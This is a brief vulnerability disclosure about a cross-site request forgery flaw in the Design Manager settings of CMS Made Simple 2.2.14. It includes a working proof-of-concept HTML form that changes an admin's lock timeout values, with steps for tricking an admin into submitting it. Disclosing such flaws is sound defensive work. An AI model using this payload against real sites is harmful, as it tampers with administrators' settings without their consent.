Summary:
CSRF on Settings - Design Manager
Detailed Description:
hello,
I discovered a CSRF vulnerablity no Settings - Design Manager
Steps to reproduce,
1) Capture the request of changing Locking
2) check all the data extract and make a html data for example
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form
action="http://cms.pick/cmsms-2.2.14-install/admin/moduleinterface.php"
method="POST" enctype="multipart/form-data">
<input type="hidden" name="mact"
value="DesignManager,m1_,admin_settings,0" />
<input type="hidden" name="__c" value="543fbd2ceebe218581e" />
<input type="hidden" name="m1_submit" value="Submit" />
<input type="hidden" name="m1_lock_timeout" value="90" />
<input type="hidden" name="m1_lock_refresh" value="120" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3) play with the value in and change it
4) send it to the admin and click submit request
5) The lockout time is changed for admin
This vulnerability affects the CMS Made Simple latest version (2.2.14) and
below. The vulnerability can be mitigated by using CSRF tokens